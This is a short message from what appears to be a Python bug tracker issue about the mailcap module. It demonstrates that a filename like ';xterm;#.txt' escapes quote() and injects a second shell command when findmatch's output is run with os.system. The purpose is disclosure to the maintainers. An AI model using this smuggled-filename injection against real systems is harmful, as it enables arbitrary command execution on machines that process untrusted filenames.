Message247951
| Author | TheRegRunner |
|---|---|
| Recipients | TheRegRunner, r.david.murray |
| Date | 2015-08-03.20:31:07 |
| SpamBayes Score | -1.0 |
| Marked as misclassified | Yes |
| Message-id | <1438633867.89.0.079701256005.issue24778@psf.upfronthosting.co.za> |
| In-reply-to |
| Content | |
|---|---|
Exploid Demo wich works with quote() :
>>> commandline,MIMETYPE=mailcap.findmatch(d, 'text/*', filename=quote(';xterm;#.txt'))
>>> commandline
"less '';xterm;#.txt''"
>>> os.system(commandline)
### xterm starts |
|
| History | |||
|---|---|---|---|
| Date | User | Action | Args |
| 2015-08-03 20:31:07 | TheRegRunner | set | recipients: + TheRegRunner, r.david.murray |
| 2015-08-03 20:31:07 | TheRegRunner | set | messageid: <1438633867.89.0.079701256005.issue24778@psf.upfronthosting.co.za> |
| 2015-08-03 20:31:07 | TheRegRunner | link | issue24778 messages |
| 2015-08-03 20:31:07 | TheRegRunner | create | |